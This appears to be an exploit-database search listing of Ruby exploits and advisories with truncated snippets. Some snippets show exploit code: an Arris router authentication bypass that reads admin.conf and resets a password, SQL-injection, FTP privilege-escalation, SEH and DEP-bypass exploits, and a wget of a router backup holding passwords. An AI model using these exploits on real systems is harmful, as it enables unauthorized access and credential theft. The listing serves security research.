61 matches found
Chemtool 1.6.14 - Memory Corruption Vulnerability
Exploit for linux platform in category dos / poc Document Title: =============== Chemtool 1.6.14 Memory Corruption Vulnerability Date: ============= 08/02/2015 Vendor Homepage: ================ http://ruby.chemie.uni-freiburg.de/martin/chemtool/ Abstract Advisory Information:...
Search all Github Repositories for an Organization
gumbler is a script I wrote to search through git commits, introduced in the blog post "Searching Through Git Commits". Recently I wanted to run Gumbler across all repositories for an organization; the steps are discussed below. First, we need to grab a list of repositories for the ORG. This c...
Arris VAP2500 - Authentication Bypass
Arris VAP2500 - Authentication Bypass !/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV0 puts "Usage: $0 " exit0 end host = ARGV0 newpass = "h4x0r3d!" http = Net::HTTP.newhost.start users = nil users = http.requestget"/admin.conf".body.split"\n".map! |user| user.sub/^.?,.$/,"\1"...
Arris VAP2500 - Authentication Bypass
!/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV0 puts "Usage: $0 " exit0 end host = ARGV0 newpass = "h4x0r3d!" http = Net::HTTP.newhost.start users = nil users = http.requestget"/admin.conf".body.split"\n".map! |user| user.sub/^.?,.$/,"\1" if users puts " found user accounts:...
Rumpus 5.1 - Local Privilege Escalation / Remote FTP LIST PoC Exploit
No description provided by source. !/usr/bin/ruby Copyright c Lance M. Havok lmh at info-pull.com Kevin Finisterre kflists at digitalmunition.com Proof of concept for issues described in MOAB-18-01-2007. require 'net/ftp' require 'socket' bugselected = ARGV0 || 0.toi targethost = ARGV1 || localho...
Apple QuickTime 7.1.3 Plug-In Arbitrary Script Execution Weakness
No description provided by source. source: http://www.securityfocus.com/bid/20138/info Apple QuickTime plug-in is prone to an arbitrary-script-execution weakness when executing QuickTime Media Link files .qtl. An attacker can exploit this issue to execute arbitrary script code in the context of t...
Traidnt UP 2.0 - Remote SQL Injection Exploit
No description provided by source. !/usr/bin/ruby ============================================= Traidnt UP v2.0 Exploit SQL Injection Vulnerability --------------------------------------------- Date: 05-08-2009 Discovered & written by: Jafer Al-Zidjali Email: jaferatscorpionds.com Website:...
Host-Extract - Enumerate All IP/Host Patterns In A Web Page
This little Ruby script tries to extract all IP/host patterns in the page response of a given URL and in the JavaScript/CSS files of that URL. With it, you can quickly identify internal IPs/hostnames, development IPs/ports, CDNs, load balancers, additional attack entries related to your target that are...
Bandizip 3.09 Crash Proof Of Concept
!/usr/bin/env ruby Exploit Title: Bandizip 3.09 .zip Crash POC Date: February 6th 2014 Author: Osanda Malith Jayathissa E-Mail: osandajayathissagmail.com Version: 3.09 32bit and 64bit Below versions might be affected Vendor Homepage: http://www.bandisoft.com/ Tested on: Windows XP 32-bit SP2 en,...
ARRIS DG860A NVRAM Backup Compressor / Decompressor
! /usr/bin/env ruby ARRIS DG860A NVRAM Backup 'Compressor/Decompressor', it really does xor? Gleaned from scmix executable in firmware dump. Backup file is world readable without authentication and contains password information in plain text. box:arris-dev cosmo$ wget http://192.168.0.1/router.da...
New Jigsaw Hacking Tool Spotted in Attacks
If you’ve run an internal phishing exercise, chances are you may have used Jigsaw, an open source penetration testing tool that enables security teams to automatically generate email address combinations from a minimal amount of public information. As with other open source security and networkin...
ActiveScriptRuby vulnerable to arbitrary Ruby script execution
Overview ActiveScriptRuby contains a vulnerability where an arbitrary Ruby script may be executed in a web browser that can execute ActiveX controls when HTML is displayed. ActiveScriptRuby is software that implements Ruby in a Windows environment. ActiveScriptRuby contains a vulnerability where...
JVN#33283707: ActiveScriptRuby vulnerable to arbitrary Ruby script execution
ActiveScriptRuby is software that implements Ruby in a Windows environment. ActiveScriptRuby contains a vulnerability where an arbitrary Ruby script may be executed in a web browser that can execute ActiveX controls when HTML is displayed. Impact A remote attacker may be able to obtain...
Novell Netware XNFS caller_name xdrDecodeString Code Execution
Application: Novell Netware XNFS callername xdrDecodeString Remote Code Execution Vulnerability Platforms: Novell Netware 6.5 SP8 Exploitation: Remote code execution CVE Number: Novell TID: 5117430 ZDI: ZDI-12-11 PRL: 2012-03 Author: Francis Provencher Protek Research Lab's Website:...
Novell Netware XNFS.NLM NFS Rename Remote Code Execution
Application: Novell Netware XNFS.NLM NFS Rename Remote Code Execution Vulnerability Platforms: Novell Netware 6.5 SP8 Exploitation: Remote code execution CVE Number: Novell TID: 5117430 ZDI: ZDI-12-06 PRL: 2012-02 Author: Francis Provencher Protek Research Lab's Website:...
A-PDF All to MP3 2.3.0 - Universal DEP Bypass
A-PDF All to MP3 2.3.0 - Universal DEP Bypass !/usr/bin/ruby +Exploit Title: A-PDF All to MP3 v2.3.0 Universal DEP Bypass Exploit +Date: 09\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.a-pdf.com/all-to-mp3/ +Version: 2.3.0 +Tested On: WIN-XP SP3 Brazilian Portuguese +CVE: N/A Dep bypa...
POP Peeper 3.7 SEH Overflow
!/usr/bin/ruby Title: POP Peeper 3.7 SEH Exploit Tested on: Windows XP SP2 EN Target: POP Peeper 3.7.0.0 Download Link: http://www.poppeeper.com/download.php Author: Anastasios Monachos secuid0 - anastasiosmatgmaildotcom Greetz: offsec team, inj3ct0r team appdata = ENV'APPDATA' file = appdata...
Host-Extract - Host/IP Pattern Extractor Tool !
Host-Extract - Host/IP Pattern Extractor Tool ! This little Ruby script tries to extract all IP/host patterns in the page response of a given URL and in the JavaScript/CSS files of that URL. With it, you can quickly identify internal IPs/hostnames, development IPs/ports, CDNs, load balancers, additional...
Microsoft Internet Explorer 8 - CSS Parser
Microsoft Internet Explorer 8 - CSS Parser !/usr/bin/env ruby Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ Author: Nephi Johnson d0cs4vage require 'socket' def httpsendsock, data, opts= defaults = :code="200", :message="OK", :type="text/html" opts =...
RomPager 4.07 Denial Of Service
Software: "RomPager/4.07 UPnP/1.0" Issue: A reboot can be caused when a specially crafted HTTP request is sent. Other Details: This version of RomPager is seen on a number of residential routers that are shipped by a number of different ISPs. The router I personally know it affects is the d-link...